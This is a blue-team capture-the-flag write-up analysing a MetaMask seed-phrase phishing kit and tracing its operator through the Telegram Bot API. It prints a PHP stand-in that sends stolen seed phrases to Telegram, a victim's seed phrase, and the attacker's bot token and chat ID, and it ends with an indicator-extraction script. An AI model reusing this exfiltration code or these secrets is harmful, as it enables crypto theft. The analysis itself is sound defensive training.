# GrabThePhisher Blue Team Challenge

:::success
https://cyberdefenders.org/blueteam-ctf-challenges/95#nav-questions
:::

:::info
Scenario: An attacker compromised a server and impersonated https://pancakeswap.finance/, a decentralized exchange native to BNB Chain, to host a phishing kit at https://apankewk.soup.xyz/mainpage.php. The attacker set it as an open directory with the file name "pankewk.zip". Provided the phishing kit, you as a SOC analyst are requested to analyze it and do your threat intel homework.
:::

Background reading on cryptocurrency wallets and seed phrases: https://medium.com/likecoin/%E5%A6%82%E4%BD%95%E6%94%B6%E8%97%8F%E5%A5%BD%E4%BD%A0%E7%9A%84%E5%8A%A0%E5%AF%86%E8%B2%A8%E5%B9%A3-daa35516cd4e

#### 1. Which wallet is used for asking the seed phrase?

```
Metamask
```

Listing the extracted kit, the only directory related to a cryptocurrency wallet is `metamask`.

![截圖 2023-12-05 下午3.52.14](https://hackmd.io/_uploads/r1h3UU2H6.jpg)

Opening the top-level `index.html` shows icons for several cryptocurrency wallets, so the landing page offers the victim a choice of wallet.

![截圖 2023-12-05 下午3.54.03](https://hackmd.io/_uploads/ByO7w8nHT.jpg)

`metamask/index.html` looks, on the surface, like a MetaMask wallet page asking for the recovery phrase.

![截圖 2023-12-05 下午3.52.35](https://hackmd.io/_uploads/SJZ08I2Ha.jpg)

Behind the page, however, it runs JavaScript whose purpose is to capture the victim's keystrokes as the seed phrase is typed.

![截圖 2023-12-05 下午4.04.11](https://hackmd.io/_uploads/Bk_FYUhrp.jpg)

The server side is `metamask.php`. Its first half takes the victim's IP address and queries sypexgeo for geolocation information about that IP.

![截圖 2023-12-05 下午3.51.08](https://hackmd.io/_uploads/ByaOLU3Bp.jpg)

Looking up api.sypexgeo.net confirms it is a geolocation API. The second half of the script then exfiltrates the captured seed phrase and victim details through the Telegram Bot API.

![截圖 2023-12-05 下午3.48.50](https://hackmd.io/_uploads/Bkeg8IhST.jpg)

#### 2. What is the file name that has the code for the phishing kit?

```
metamask.php
```

Following on from Q1, the kit's collection and exfiltration logic lives in `metamask.php`.

#### 3. In which language was the kit written?

```
php
```

Following on from Q2, the kit is written in PHP.

#### 4. What service does the kit use to retrieve the victim's machine information?

```
sypex geo
```

Following on from Q1, the script calls http://api.sypexgeo.net/json to collect geolocation data about the victim.

#### 5. How many seed phrases were already collected?

```
3
```

Following on from Q1, the collected data is also written to `/log/log.txt` inside the kit, which contains three entries.

![截圖 2023-12-05 下午4.12.25](https://hackmd.io/_uploads/BkI_iIhH6.jpg)

#### 6. Write down the seed phrase of the most recent phishing incident?

```
father also recycle embody balance concert mechanic believe owner pair muffin hockey
```

Following on from Q5, this is the last entry in `/log/log.txt`.

#### 7. Which medium had been used for credential dumping?

```
telegram
```

Following on from Q1, the stolen data is sent out via Telegram.

#### 8. What is the token for the channel?

```
5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10
```

Following on from Q1, the bot token is hard-coded in `metamask.php`.

#### 9. What is the chat ID of the phisher's channel?

```
5442785564
```

Following on from Q1, the chat ID is likewise hard-coded in `metamask.php`.

#### 10. What are the allies of the phish kit developer?

```
j1j1b1s@m3r0
```

Following on from Q1.

#### 11. What is the full name of the Phish Actor?

```
Marcus Aurelius
```

From Q1 we know the Telegram API endpoint the attacker uses to send data, together with the token and chat_id parameters.

![截圖 2023-12-06 下午3.45.16](https://hackmd.io/_uploads/ByTqLjTST.jpg)

Resending a request in the same format once more:

```
https://api.telegram.org/bot5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10/sendMessage?chat_id=5442785564&text="123456"&parse_mode=html
```

The response contains a `chat` object describing the recipient, which includes the phisher's full name.

![截圖 2023-12-05 下午5.03.41](https://hackmd.io/_uploads/Hk9OvwhHp.jpg)

Note that `sendMessage` actually delivers the text into the phisher's chat and so tips them off that someone has the token. The Bot API's `getChat` method (`/bot<token>/getChat?chat_id=<id>`) returns the same `Chat` object (`first_name`, `last_name`, `username`) without sending anything, and is the quieter choice for threat-intel work.

#### 12. What is the username of the Phish Actor?

```
pumpkinboii
```

Following on from Q11, the same response also contains the `username` field.
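The triage steps above (pulling the bot token, chat ID and contacted hosts out of the kit, then reading the actor's identity from the Bot API response) can be scripted. The following is an added example for this writeup, not code from the kit or from CyberDefenders: the PHP fragment and the JSON response are constructed stand-ins whose variable names and layout are assumptions (the real `metamask.php` and the real response are only shown in the screenshots), while the token, chat ID, hosts, name and username are the values recovered in the answers.

```python
"""Triage helpers for a PHP phishing kit that exfiltrates over the Telegram Bot API.

Added example for this writeup; the PHP fragment and API response below are
constructed stand-ins, not the real metamask.php or the real Telegram reply.
"""
import json
import re
from urllib.parse import urlencode, urlsplit

# Constructed stand-in for the relevant lines of metamask.php. Variable names,
# the log format and the sypexgeo field used are assumptions; the token,
# chat_id and hosts are the ones found in the kit.
SAMPLE_PHP = r'''<?php
$ip = $_SERVER['REMOTE_ADDR'];
$geo = json_decode(file_get_contents("http://api.sypexgeo.net/json/" . $ip), true);
$token = "5457463144:AAG8t4k7e2ew3tTi0IBShcWbSia0Irvxm10";
$chat_id = "5442785564";
$msg = "Seed: " . $_POST['seed'] . " | IP: " . $ip . " | " . $geo['country']['name_en'];
file_get_contents("https://api.telegram.org/bot$token/sendMessage?chat_id=$chat_id&text=" . urlencode($msg) . "&parse_mode=html");
file_put_contents(__DIR__ . "/log/log.txt", $msg . PHP_EOL, FILE_APPEND);
'''

# A Bot API token is "<numeric bot id>:<35 characters of [A-Za-z0-9_-]>".
TOKEN_RE = re.compile(r"(?<![A-Za-z0-9_-])(\d{8,10}:[A-Za-z0-9_-]{35})(?![A-Za-z0-9_-])")
# Literal chat_id assignments only; "chat_id=$chat_id" in the URL is skipped.
CHAT_ID_RE = re.compile(r"chat_id\s*=\s*['\"]?(-?\d+)")
URL_RE = re.compile(r"https?://[^\s\"'<>()]+")


def extract_telegram_config(php_source: str) -> dict:
    """Pull hard-coded bot tokens and chat IDs out of kit source (Q8, Q9)."""
    tokens = sorted(set(TOKEN_RE.findall(php_source)))
    chat_ids = sorted(set(CHAT_ID_RE.findall(php_source)))
    return {"tokens": tokens, "chat_ids": chat_ids}


def external_hosts(php_source: str) -> list[str]:
    """Hostnames the kit talks to (geo lookup, exfil channel): the IOC list (Q4, Q7)."""
    hosts = {urlsplit(u).hostname for u in URL_RE.findall(php_source)}
    return sorted(h for h in hosts if h)


def bot_api_url(token: str, method: str, **params) -> str:
    """Build a Bot API call. getChat only reads chat metadata; sendMessage
    delivers a message into the phisher's chat and therefore alerts them."""
    return f"https://api.telegram.org/bot{token}/{method}?{urlencode(params)}"


# Constructed stand-in for the Bot API reply (shape follows the documented
# sendMessage response; the name and username are the ones recovered in Q11/Q12).
SAMPLE_RESPONSE = json.dumps({
    "ok": True,
    "result": {
        "message_id": 1,
        "chat": {"id": 5442785564, "first_name": "Marcus", "last_name": "Aurelius",
                 "username": "pumpkinboii", "type": "private"},
        "date": 1701792000,
        "text": "123456",
    },
})


def actor_from_response(payload: str) -> dict:
    """Recover the chat owner's identity from a sendMessage or getChat response.
    sendMessage nests the Chat object under result.chat; getChat returns it as result."""
    data = json.loads(payload)
    if not data.get("ok"):
        raise ValueError(f"Bot API error {data.get('error_code')}: {data.get('description')}")
    chat = data["result"].get("chat", data["result"])
    full_name = " ".join(p for p in (chat.get("first_name"), chat.get("last_name")) if p)
    return {"chat_id": chat.get("id"), "full_name": full_name,
            "username": chat.get("username"), "type": chat.get("type")}


if __name__ == "__main__":
    cfg = extract_telegram_config(SAMPLE_PHP)
    print("IOC hosts:", external_hosts(SAMPLE_PHP))
    print("Telegram config:", cfg)
    for token in cfg["tokens"]:
        for chat_id in cfg["chat_ids"]:
            print("quiet lookup:", bot_api_url(token, "getChat", chat_id=chat_id))
    print("actor:", actor_from_response(SAMPLE_RESPONSE))
```

Run it against the real `metamask.php` by reading the file into `extract_telegram_config` and `external_hosts`; the `getChat` URL it prints is what to fetch instead of the `sendMessage` request used above, and `actor_from_response` accepts the JSON from either method.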